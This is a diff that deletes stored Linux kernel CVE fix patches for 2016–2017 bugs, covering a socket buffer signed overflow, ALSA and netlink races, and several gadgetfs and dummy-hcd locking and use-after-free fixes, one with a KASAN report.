@@ -1,49 +0,0 @@ -From b98b0bc8c431e3ceb4b26b0dfc8db509518fb290 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 2 Dec 2016 09:44:53 -0800 -Subject: net: avoid signed overflows for SO_{SND|RCV}BUFFORCE - -CAP_NET_ADMIN users should not be allowed to set negative -sk_sndbuf or sk_rcvbuf values, as it can lead to various memory -corruptions, crashes, OOM... - -Note that before commit 82981930125a ("net: cleanups in -sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF -and SO_RCVBUF were vulnerable. - -This needs to be backported to all known linux kernels. - -Again, many thanks to syzkaller team for discovering this gem. - -Signed-off-by: Eric Dumazet -Reported-by: Andrey Konovalov -Signed-off-by: David S. Miller ---- - net/core/sock.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/net/core/sock.c b/net/core/sock.c -index 5e3ca41..00a074d 100644 ---- a/net/core/sock.c -+++ b/net/core/sock.c -@@ -715,7 +715,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname, - val = min_t(u32, val, sysctl_wmem_max); - set_sndbuf: - sk->sk_userlocks |= SOCK_SNDBUF_LOCK; -- sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF); -+ sk->sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF); - /* Wake up sending tasks if we upped the value. */ - sk->sk_write_space(sk); - break; -@@ -751,7 +751,7 @@ set_rcvbuf: - * returning the value we actually used in getsockopt - * is the most desirable behavior. - */ -- sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF); -+ sk->sk_rcvbuf = max_t(int, val * 2, SOCK_MIN_RCVBUF); - break; - - case SO_RCVBUFFORCE: --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch deleted file mode 100644 index 5c2df6c8..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch +++ /dev/null 
@@ -1,49 +0,0 @@ -From a27178e05b7c332522df40904f27674e36ee3757 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Mon, 12 Dec 2016 17:33:06 +0100 -Subject: ALSA: pcm : Call kill_fasync() in stream lock - -commit 3aa02cb664c5fb1042958c8d1aa8c35055a2ebc4 upstream. - -Currently kill_fasync() is called outside the stream lock in -snd_pcm_period_elapsed(). This is potentially racy, since the stream -may get released even during the irq handler is running. Although -snd_pcm_release_substream() calls snd_pcm_drop(), this doesn't -guarantee that the irq handler finishes, thus the kill_fasync() call -outside the stream spin lock may be invoked after the substream is -detached, as recently reported by KASAN. - -As a quick workaround, move kill_fasync() call inside the stream -lock. The fasync is rarely used interface, so this shouldn't have a -big impact from the performance POV. - -Ideally, we should implement some sync mechanism for the proper finish -of stream and irq handler. But this oneliner should suffice for most -cases, so far. - -Reported-by: Baozeng Ding -Signed-off-by: Takashi Iwai -Signed-off-by: Willy Tarreau ---- - sound/core/pcm_lib.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c -index 8eddece..dfed3ef 100644 ---- a/sound/core/pcm_lib.c -+++ b/sound/core/pcm_lib.c -@@ -1856,10 +1856,10 @@ void snd_pcm_period_elapsed(struct snd_pcm_substream *substream) - if (substream->timer_running) - snd_timer_interrupt(substream->timer, 1); - _end: -+ kill_fasync(&runtime->fasync, SIGIO, POLL_IN); - snd_pcm_stream_unlock_irqrestore(substream, flags); - if (runtime->transfer_ack_end) - runtime->transfer_ack_end(substream); -- kill_fasync(&runtime->fasync, SIGIO, POLL_IN); - } - - EXPORT_SYMBOL(snd_pcm_period_elapsed); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch deleted file mode 100644 index 9c899b7e..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch +++ /dev/null @@ -1,50 +0,0 @@ -From 92964c79b357efd980812c4de5c1fd2ec8bb5520 Mon Sep 17 00:00:00 2001 -From: Herbert Xu -Date: Mon, 16 May 2016 17:28:16 +0800 -Subject: netlink: Fix dump skb leak/double free - -When we free cb->skb after a dump, we do it after releasing the -lock. This means that a new dump could have started in the time -being and we'll end up freeing their skb instead of ours. - -This patch saves the skb and module before we unlock so we free -the right memory. - -Fixes: 16b304f3404f ("netlink: Eliminate kmalloc in netlink dump operation.") -Reported-by: Baozeng Ding -Signed-off-by: Herbert Xu -Acked-by: Cong Wang -Signed-off-by: David S. Miller ---- - net/netlink/af_netlink.c | 7 +++++-- - 1 file changed, 5 insertions(+), 2 deletions(-) - -diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c -index aeefe12..627f898 100644 ---- a/net/netlink/af_netlink.c -+++ b/net/netlink/af_netlink.c -@@ -2059,6 +2059,7 @@ static int netlink_dump(struct sock *sk) - struct netlink_callback *cb; - struct sk_buff *skb = NULL; - struct nlmsghdr *nlh; -+ struct module *module; - int len, err = -ENOBUFS; - int alloc_min_size; - int alloc_size; -@@ -2134,9 +2135,11 @@ static int netlink_dump(struct sock *sk) - cb->done(cb); - - nlk->cb_running = false; -+ module = cb->module; -+ skb = cb->skb; - mutex_unlock(nlk->cb_mutex); -- module_put(cb->module); -- consume_skb(cb->skb); -+ module_put(module); -+ consume_skb(skb); - return 0; - - errout_skb: --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch deleted file mode 100644 index b6cd2b4b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch +++ /dev/null 
@@ -1,76 +0,0 @@ -From 0173a68bfb0ad1c72a6ee39cc485aa2c97540b98 Mon Sep 17 00:00:00 2001 -From: Alan Stern -Date: Tue, 26 Sep 2017 15:15:40 -0400 -Subject: [PATCH] USB: dummy-hcd: fix infinite-loop resubmission bug - -The dummy-hcd HCD/UDC emulator tries not to do too much work during -each timer interrupt. But it doesn't try very hard; currently all -it does is limit the total amount of bulk data transferred. Other -transfer types aren't limited, and URBs that transfer no data (because -of an error, perhaps) don't count toward the limit, even though on a -real USB bus they would consume at least a minimum overhead. - -This means it's possible to get the driver stuck in an infinite loop, -for example, if the host class driver resubmits an URB every time it -completes (which is common for interrupt URBs). Each time the URB is -resubmitted it gets added to the end of the pending-URBs list, and -dummy-hcd doesn't stop until that list is empty. Andrey Konovalov was -able to trigger this failure mode using the syzkaller fuzzer. - -This patch fixes the infinite-loop problem by restricting the URBs -handled during each timer interrupt to those that were already on the -pending list when the interrupt routine started. Newly added URBs -won't be processed until the next timer interrupt. The problem of -properly accounting for non-bulk bandwidth (as well as packet and -transaction overhead) is not addressed here. 
- -Signed-off-by: Alan Stern -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -CC: -Signed-off-by: Felipe Balbi ---- - drivers/usb/gadget/udc/dummy_hcd.c | 9 +++++++++ - 1 file changed, 9 insertions(+) - -diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c -index d515ec31afe44..b2ab9cc33fec4 100644 ---- a/drivers/usb/gadget/udc/dummy_hcd.c -+++ b/drivers/usb/gadget/udc/dummy_hcd.c -@@ -237,6 +237,8 @@ struct dummy_hcd { - - struct usb_device *udev; - struct list_head urbp_list; -+ struct urbp *next_frame_urbp; -+ - u32 stream_en_ep; - u8 num_stream[30 / 2]; - -@@ -1250,6 +1252,8 @@ static int dummy_urb_enqueue( - - list_add_tail(&urbp->urbp_list, &dum_hcd->urbp_list); - urb->hcpriv = urbp; -+ if (!dum_hcd->next_frame_urbp) -+ dum_hcd->next_frame_urbp = urbp; - if (usb_pipetype(urb->pipe) == PIPE_CONTROL) - urb->error_count = 1; /* mark as a new urb */ - -@@ -1766,6 +1770,7 @@ static void dummy_timer(unsigned long _dum_hcd) - spin_unlock_irqrestore(&dum->lock, flags); - return; - } -+ dum_hcd->next_frame_urbp = NULL; - - for (i = 0; i < DUMMY_ENDPOINTS; i++) { - if (!ep_info[i].name) -@@ -1782,6 +1787,10 @@ static void dummy_timer(unsigned long _dum_hcd) - int type; - int status = -EINPROGRESS; - -+ /* stop when we reach URBs queued after the timer interrupt */ -+ if (urbp == dum_hcd->next_frame_urbp) -+ break; -+ - urb = urbp->urb; - if (urb->unlinked) - goto return_urb; diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch deleted file mode 100644 index dc975650..00000000 --- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch +++ /dev/null 
@@ -1,186 +0,0 @@
-From 520b72fc64debf8a86c3853b8e486aa5982188f0 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Thu, 21 Sep 2017 13:23:58 -0400
-Subject: [PATCH] USB: gadgetfs: Fix crash caused by inadequate synchronization
-
-The gadgetfs driver (drivers/usb/gadget/legacy/inode.c) was written
-before the UDC and composite frameworks were adopted; it is a legacy
-driver. As such, it expects that once bound to a UDC controller, it
-will not be unbound until it unregisters itself.
-
-However, the UDC framework does unbind function drivers while they are
-still registered. When this happens, it can cause the gadgetfs driver
-to misbehave or crash. For example, userspace can cause a crash by
-opening the device file and doing an ioctl call before setting up a
-configuration (found by Andrey Konovalov using the syzkaller fuzzer).
-
-This patch adds checks and synchronization to prevent these bad
-behaviors. It adds a udc_usage counter that the driver increments at
-times when it is using a gadget interface without holding the private
-spinlock. The unbind routine waits for this counter to go to 0 before
-returning, thereby ensuring that the UDC is no longer in use.
-
-The patch also adds a check in the dev_ioctl() routine to make sure
-the driver is bound to a UDC before dereferencing the gadget pointer,
-and it makes destroy_ep_files() synchronize with the endpoint I/O
-routines, to prevent the user from accessing an endpoint data
-structure after it has been removed.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-CC:
-Acked-by: Felipe Balbi
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/gadget/legacy/inode.c | 41 ++++++++++++++++++++++++++++++++++-----
- 1 file changed, 36 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 956b3dc7c3a4d..5c28bee327e15 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -28,7 +28,7 @@
- #include
- #include
- #include
--
-+#include
- #include
- #include
-
-@@ -116,6 +116,7 @@ enum ep0_state {
- struct dev_data {
- spinlock_t lock;
- refcount_t count;
-+ int udc_usage;
- enum ep0_state state; /* P: lock */
- struct usb_gadgetfs_event event [N_EVENT];
- unsigned ev_next;
-@@ -513,9 +514,9 @@ static void ep_aio_complete(struct usb_ep *ep, struct usb_request *req)
- INIT_WORK(&priv->work, ep_user_copy_worker);
- schedule_work(&priv->work);
- }
-- spin_unlock(&epdata->dev->lock);
-
- usb_ep_free_request(ep, req);
-+ spin_unlock(&epdata->dev->lock);
- put_ep(epdata);
- }
-
-@@ -939,9 +940,11 @@ ep0_read (struct file *fd, char __user *buf, size_t len, loff_t *ptr)
- struct usb_request *req = dev->req;
-
- if ((retval = setup_req (ep, req, 0)) == 0) {
-+ ++dev->udc_usage;
- spin_unlock_irq (&dev->lock);
- retval = usb_ep_queue (ep, req, GFP_KERNEL);
- spin_lock_irq (&dev->lock);
-+ --dev->udc_usage;
- }
- dev->state = STATE_DEV_CONNECTED;
-
-@@ -1134,6 +1137,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- retval = setup_req (dev->gadget->ep0, dev->req, len);
- if (retval == 0) {
- dev->state = STATE_DEV_CONNECTED;
-+ ++dev->udc_usage;
- spin_unlock_irq (&dev->lock);
- if (copy_from_user (dev->req->buf, buf, len))
- retval = -EFAULT;
-@@ -1145,6 +1149,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- GFP_KERNEL);
- }
- spin_lock_irq(&dev->lock);
-+ --dev->udc_usage;
- if (retval < 0) {
- clean_req (dev->gadget->ep0, dev->req);
- } else
-@@ -1246,9 +1251,21 @@ static long dev_ioctl (struct file *fd, unsigned code, unsigned long value)
- struct usb_gadget *gadget = dev->gadget;
- long ret = -ENOTTY;
-
-- if (gadget->ops->ioctl)
-+ spin_lock_irq(&dev->lock);
-+ if (dev->state == STATE_DEV_OPENED ||
-+ dev->state == STATE_DEV_UNBOUND) {
-+ /* Not bound to a UDC */
-+ } else if (gadget->ops->ioctl) {
-+ ++dev->udc_usage;
-+ spin_unlock_irq(&dev->lock);
-+
- ret = gadget->ops->ioctl (gadget, code, value);
-
-+ spin_lock_irq(&dev->lock);
-+ --dev->udc_usage;
-+ }
-+ spin_unlock_irq(&dev->lock);
-+
- return ret;
- }
-
-@@ -1466,10 +1483,12 @@ gadgetfs_setup (struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
- if (value < 0)
- break;
-
-+ ++dev->udc_usage;
- spin_unlock (&dev->lock);
- value = usb_ep_queue (gadget->ep0, dev->req,
- GFP_KERNEL);
- spin_lock (&dev->lock);
-+ --dev->udc_usage;
- if (value < 0) {
- clean_req (gadget->ep0, dev->req);
- break;
-@@ -1493,8 +1512,12 @@ gadgetfs_setup (struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
- req->length = value;
- req->zero = value < w_length;
-
-+ ++dev->udc_usage;
- spin_unlock (&dev->lock);
- value = usb_ep_queue (gadget->ep0, req, GFP_KERNEL);
-+ spin_lock(&dev->lock);
-+ --dev->udc_usage;
-+ spin_unlock(&dev->lock);
- if (value < 0) {
- DBG (dev, "ep_queue --> %d\n", value);
- req->status = 0;
-@@ -1521,21 +1544,24 @@ static void destroy_ep_files (struct dev_data *dev)
- /* break link to FS */
- ep = list_first_entry (&dev->epfiles, struct ep_data, epfiles);
- list_del_init (&ep->epfiles);
-+ spin_unlock_irq (&dev->lock);
-+
- dentry = ep->dentry;
- ep->dentry = NULL;
- parent = d_inode(dentry->d_parent);
-
- /* break link to controller */
-+ mutex_lock(&ep->lock);
- if (ep->state == STATE_EP_ENABLED)
- (void) usb_ep_disable (ep->ep);
- ep->state = STATE_EP_UNBOUND;
- usb_ep_free_request (ep->ep, ep->req);
- ep->ep = NULL;
-+ mutex_unlock(&ep->lock);
-+
- wake_up (&ep->wait);
- put_ep (ep);
-
-- spin_unlock_irq (&dev->lock);
--
- /* break link to dcache */
- inode_lock(parent);
- d_delete (dentry);
-@@ -1606,6 +1632,11 @@ gadgetfs_unbind (struct usb_gadget *gadget)
-
- spin_lock_irq (&dev->lock);
- dev->state = STATE_DEV_UNBOUND;
-+ while (dev->udc_usage > 0) {
-+ spin_unlock_irq(&dev->lock);
-+ usleep_range(1000, 2000);
-+ spin_lock_irq(&dev->lock);
-+ }
- spin_unlock_irq (&dev->lock);
-
- destroy_ep_files (dev);
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch
deleted file mode 100644
index d6963da2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 6e76c01e71551cb221c1f3deacb9dcd9a7346784 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Thu, 21 Sep 2017 16:12:01 -0400
-Subject: [PATCH] USB: gadgetfs: fix copy_to_user while holding spinlock
-
-The gadgetfs driver as a long-outstanding FIXME, regarding a call of
-copy_to_user() made while holding a spinlock. This patch fixes the
-issue by dropping the spinlock and using the dev->udc_usage mechanism
-introduced by another recent patch to guard against status changes
-while the lock isn't held.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-CC:
-Acked-by: Felipe Balbi
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/gadget/legacy/inode.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 684900fcfe24c..956b3dc7c3a4d 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -983,11 +983,14 @@ ep0_read (struct file *fd, char __user *buf, size_t len, loff_t *ptr)
- retval = -EIO;
- else {
- len = min (len, (size_t)dev->req->actual);
--// FIXME don't call this with the spinlock held ...
-+ ++dev->udc_usage;
-+ spin_unlock_irq(&dev->lock);
- if (copy_to_user (buf, dev->req->buf, len))
- retval = -EFAULT;
- else
- retval = len;
-+ spin_lock_irq(&dev->lock);
-+ --dev->udc_usage;
- clean_req (dev->gadget->ep0, dev->req);
- /* NOTE userspace can't yet choose to stall */
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch
deleted file mode 100644
index 5d159efe..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch
+++ /dev/null
@@ -1,264 +0,0 @@
-From f16443a034c7aa359ddf6f0f9bc40d01ca31faea Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Tue, 13 Jun 2017 15:23:42 -0400
-Subject: [PATCH] USB: gadgetfs, dummy-hcd, net2280: fix locking for callbacks
-
-Using the syzkaller kernel fuzzer, Andrey Konovalov generated the
-following error in gadgetfs:
-
-> BUG: KASAN: use-after-free in __lock_acquire+0x3069/0x3690
-> kernel/locking/lockdep.c:3246
-> Read of size 8 at addr ffff88003a2bdaf8 by task kworker/3:1/903
->
-> CPU: 3 PID: 903 Comm: kworker/3:1 Not tainted 4.12.0-rc4+ #35
-> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-> Workqueue: usb_hub_wq hub_event
-> Call Trace:
-> __dump_stack lib/dump_stack.c:16 [inline]
-> dump_stack+0x292/0x395 lib/dump_stack.c:52
-> print_address_description+0x78/0x280 mm/kasan/report.c:252
-> kasan_report_error mm/kasan/report.c:351 [inline]
-> kasan_report+0x230/0x340 mm/kasan/report.c:408
-> __asan_report_load8_noabort+0x19/0x20 mm/kasan/report.c:429
-> __lock_acquire+0x3069/0x3690 kernel/locking/lockdep.c:3246
-> lock_acquire+0x22d/0x560 kernel/locking/lockdep.c:3855
-> __raw_spin_lock include/linux/spinlock_api_smp.h:142 [inline]
-> _raw_spin_lock+0x2f/0x40 kernel/locking/spinlock.c:151
-> spin_lock include/linux/spinlock.h:299 [inline]
-> gadgetfs_suspend+0x89/0x130 drivers/usb/gadget/legacy/inode.c:1682
-> set_link_state+0x88e/0xae0 drivers/usb/gadget/udc/dummy_hcd.c:455
-> dummy_hub_control+0xd7e/0x1fb0 drivers/usb/gadget/udc/dummy_hcd.c:2074
-> rh_call_control drivers/usb/core/hcd.c:689 [inline]
-> rh_urb_enqueue drivers/usb/core/hcd.c:846 [inline]
-> usb_hcd_submit_urb+0x92f/0x20b0 drivers/usb/core/hcd.c:1650
-> usb_submit_urb+0x8b2/0x12c0 drivers/usb/core/urb.c:542
-> usb_start_wait_urb+0x148/0x5b0 drivers/usb/core/message.c:56
-> usb_internal_control_msg drivers/usb/core/message.c:100 [inline]
-> usb_control_msg+0x341/0x4d0 drivers/usb/core/message.c:151
-> usb_clear_port_feature+0x74/0xa0 drivers/usb/core/hub.c:412
-> hub_port_disable+0x123/0x510 drivers/usb/core/hub.c:4177
-> hub_port_init+0x1ed/0x2940 drivers/usb/core/hub.c:4648
-> hub_port_connect drivers/usb/core/hub.c:4826 [inline]
-> hub_port_connect_change drivers/usb/core/hub.c:4999 [inline]
-> port_event drivers/usb/core/hub.c:5105 [inline]
-> hub_event+0x1ae1/0x3d40 drivers/usb/core/hub.c:5185
-> process_one_work+0xc08/0x1bd0 kernel/workqueue.c:2097
-> process_scheduled_works kernel/workqueue.c:2157 [inline]
-> worker_thread+0xb2b/0x1860 kernel/workqueue.c:2233
-> kthread+0x363/0x440 kernel/kthread.c:231
-> ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:424
->
-> Allocated by task 9958:
-> save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
-> save_stack+0x43/0xd0 mm/kasan/kasan.c:513
-> set_track mm/kasan/kasan.c:525 [inline]
-> kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617
-> kmem_cache_alloc_trace+0x87/0x280 mm/slub.c:2745
-> kmalloc include/linux/slab.h:492 [inline]
-> kzalloc include/linux/slab.h:665 [inline]
-> dev_new drivers/usb/gadget/legacy/inode.c:170 [inline]
-> gadgetfs_fill_super+0x24f/0x540 drivers/usb/gadget/legacy/inode.c:1993
-> mount_single+0xf6/0x160 fs/super.c:1192
-> gadgetfs_mount+0x31/0x40 drivers/usb/gadget/legacy/inode.c:2019
-> mount_fs+0x9c/0x2d0 fs/super.c:1223
-> vfs_kern_mount.part.25+0xcb/0x490 fs/namespace.c:976
-> vfs_kern_mount fs/namespace.c:2509 [inline]
-> do_new_mount fs/namespace.c:2512 [inline]
-> do_mount+0x41b/0x2d90 fs/namespace.c:2834
-> SYSC_mount fs/namespace.c:3050 [inline]
-> SyS_mount+0xb0/0x120 fs/namespace.c:3027
-> entry_SYSCALL_64_fastpath+0x1f/0xbe
->
-> Freed by task 9960:
-> save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
-> save_stack+0x43/0xd0 mm/kasan/kasan.c:513
-> set_track mm/kasan/kasan.c:525 [inline]
-> kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590
-> slab_free_hook mm/slub.c:1357 [inline]
-> slab_free_freelist_hook mm/slub.c:1379 [inline]
-> slab_free mm/slub.c:2961 [inline]
-> kfree+0xed/0x2b0 mm/slub.c:3882
-> put_dev+0x124/0x160 drivers/usb/gadget/legacy/inode.c:163
-> gadgetfs_kill_sb+0x33/0x60 drivers/usb/gadget/legacy/inode.c:2027
-> deactivate_locked_super+0x8d/0xd0 fs/super.c:309
-> deactivate_super+0x21e/0x310 fs/super.c:340
-> cleanup_mnt+0xb7/0x150 fs/namespace.c:1112
-> __cleanup_mnt+0x1b/0x20 fs/namespace.c:1119
-> task_work_run+0x1a0/0x280 kernel/task_work.c:116
-> exit_task_work include/linux/task_work.h:21 [inline]
-> do_exit+0x18a8/0x2820 kernel/exit.c:878
-> do_group_exit+0x14e/0x420 kernel/exit.c:982
-> get_signal+0x784/0x1780 kernel/signal.c:2318
-> do_signal+0xd7/0x2130 arch/x86/kernel/signal.c:808
-> exit_to_usermode_loop+0x1ac/0x240 arch/x86/entry/common.c:157
-> prepare_exit_to_usermode arch/x86/entry/common.c:194 [inline]
-> syscall_return_slowpath+0x3ba/0x410 arch/x86/entry/common.c:263
-> entry_SYSCALL_64_fastpath+0xbc/0xbe
->
-> The buggy address belongs to the object at ffff88003a2bdae0
-> which belongs to the cache kmalloc-1024 of size 1024
-> The buggy address is located 24 bytes inside of
-> 1024-byte region [ffff88003a2bdae0, ffff88003a2bdee0)
-> The buggy address belongs to the page:
-> page:ffffea0000e8ae00 count:1 mapcount:0 mapping: (null)
-> index:0x0 compound_mapcount: 0
-> flags: 0x100000000008100(slab|head)
-> raw: 0100000000008100 0000000000000000 0000000000000000 0000000100170017
-> raw: ffffea0000ed3020 ffffea0000f5f820 ffff88003e80efc0 0000000000000000
-> page dumped because: kasan: bad access detected
->
-> Memory state around the buggy address:
-> ffff88003a2bd980: fb fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-> ffff88003a2bda00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-> >ffff88003a2bda80: fc fc fc fc fc fc fc fc fc fc fc fc fb fb fb fb
-> ^
-> ffff88003a2bdb00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-> ffff88003a2bdb80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-> ==================================================================
-
-What this means is that the gadgetfs_suspend() routine was trying to
-access dev->lock after it had been deallocated. The root cause is a
-race in the dummy_hcd driver; the dummy_udc_stop() routine can race
-with the rest of the driver because it contains no locking. And even
-when proper locking is added, it can still race with the
-set_link_state() function because that function incorrectly drops the
-private spinlock before invoking any gadget driver callbacks.
-
-The result of this race, as seen above, is that set_link_state() can
-invoke a callback in gadgetfs even after gadgetfs has been unbound
-from dummy_hcd's UDC and its private data structures have been
-deallocated.
-
-include/linux/usb/gadget.h documents that the ->reset, ->disconnect,
-->suspend, and ->resume callbacks may be invoked in interrupt context.
-In general this is necessary, to prevent races with gadget driver
-removal. This patch fixes dummy_hcd to retain the spinlock across
-these calls, and it adds a spinlock acquisition to dummy_udc_stop() to
-prevent the race.
-
-The net2280 driver makes the same mistake of dropping the private
-spinlock for its ->disconnect and ->reset callback invocations. The
-patch fixes it too.
-
-Lastly, since gadgetfs_suspend() may be invoked in interrupt context,
-it cannot assume that interrupts are enabled when it runs. It must
-use spin_lock_irqsave() instead of spin_lock_irq(). The patch fixes
-that bug as well.
-
-Signed-off-by: Alan Stern
-Reported-and-tested-by: Andrey Konovalov
-CC:
-Acked-by: Felipe Balbi
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/gadget/legacy/inode.c | 5 +++--
- drivers/usb/gadget/udc/dummy_hcd.c | 13 ++++---------
- drivers/usb/gadget/udc/net2280.c | 9 +--------
- 3 files changed, 8 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 5ffd879f78868..684900fcfe24c 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1679,9 +1679,10 @@ static void
- gadgetfs_suspend (struct usb_gadget *gadget)
- {
- struct dev_data *dev = get_gadget_data (gadget);
-+ unsigned long flags;
-
- INFO (dev, "suspended from state %d\n", dev->state);
-- spin_lock (&dev->lock);
-+ spin_lock_irqsave(&dev->lock, flags);
- switch (dev->state) {
- case STATE_DEV_SETUP: // VERY odd... host died??
- case STATE_DEV_CONNECTED:
-@@ -1692,7 +1693,7 @@ gadgetfs_suspend (struct usb_gadget *gadget)
- default:
- break;
- }
-- spin_unlock (&dev->lock);
-+ spin_unlock_irqrestore(&dev->lock, flags);
- }
-
- static struct usb_gadget_driver gadgetfs_driver = {
-diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c
-index ccabb51cb98da..7635fd7cc328c 100644
---- a/drivers/usb/gadget/udc/dummy_hcd.c
-+++ b/drivers/usb/gadget/udc/dummy_hcd.c
-@@ -442,23 +442,16 @@ static void set_link_state(struct dummy_hcd *dum_hcd)
- /* Report reset and disconnect events to the driver */
- if (dum->driver && (disconnect || reset)) {
- stop_activity(dum);
-- spin_unlock(&dum->lock);
- if (reset)
- usb_gadget_udc_reset(&dum->gadget, dum->driver);
- else
- dum->driver->disconnect(&dum->gadget);
-- spin_lock(&dum->lock);
- }
- } else if (dum_hcd->active != dum_hcd->old_active) {
-- if (dum_hcd->old_active && dum->driver->suspend) {
-- spin_unlock(&dum->lock);
-+ if (dum_hcd->old_active && dum->driver->suspend)
- dum->driver->suspend(&dum->gadget);
-- spin_lock(&dum->lock);
-- } else if (!dum_hcd->old_active && dum->driver->resume) {
-- spin_unlock(&dum->lock);
-+ else if (!dum_hcd->old_active && dum->driver->resume)
- dum->driver->resume(&dum->gadget);
-- spin_lock(&dum->lock);
-- }
- }
-
- dum_hcd->old_status = dum_hcd->port_status;
-@@ -983,7 +976,9 @@ static int dummy_udc_stop(struct usb_gadget *g)
- struct dummy_hcd *dum_hcd = gadget_to_dummy_hcd(g);
- struct dummy *dum = dum_hcd->dum;
-
-+ spin_lock_irq(&dum->lock);
- dum->driver = NULL;
-+ spin_unlock_irq(&dum->lock);
-
- return 0;
- }
-diff --git a/drivers/usb/gadget/udc/net2280.c b/drivers/usb/gadget/udc/net2280.c
-index 6cf07857eacaa..f2cbd7f8005e1 100644
---- a/drivers/usb/gadget/udc/net2280.c
-+++ b/drivers/usb/gadget/udc/net2280.c
-@@ -2470,11 +2470,8 @@ static void stop_activity(struct net2280 *dev, struct usb_gadget_driver *driver)
- nuke(&dev->ep[i]);
-
- /* report disconnect; the driver is already quiesced */
-- if (driver) {
-- spin_unlock(&dev->lock);
-+ if (driver)
- driver->disconnect(&dev->gadget);
-- spin_lock(&dev->lock);
-- }
-
- usb_reinit(dev);
- }
-@@ -3348,8 +3345,6 @@ static void handle_stat0_irqs(struct net2280 *dev, u32 stat)
- BIT(PCI_RETRY_ABORT_INTERRUPT))
-
- static void handle_stat1_irqs(struct net2280 *dev, u32 stat)
--__releases(dev->lock)
--__acquires(dev->lock)
- {
- struct net2280_ep *ep;
- u32 tmp, num, mask, scratch;
-@@ -3390,14 +3385,12 @@ __acquires(dev->lock)
- if (disconnect || reset) {
- stop_activity(dev, dev->driver);
- ep0_start(dev);
-- spin_unlock(&dev->lock);
- if (reset)
- usb_gadget_udc_reset
- (&dev->gadget, dev->driver);
- else
- (dev->driver->disconnect)
- (&dev->gadget);
-- spin_lock(&dev->lock);
- return;
- }
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch
deleted file mode 100644
index 066bb3a0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch
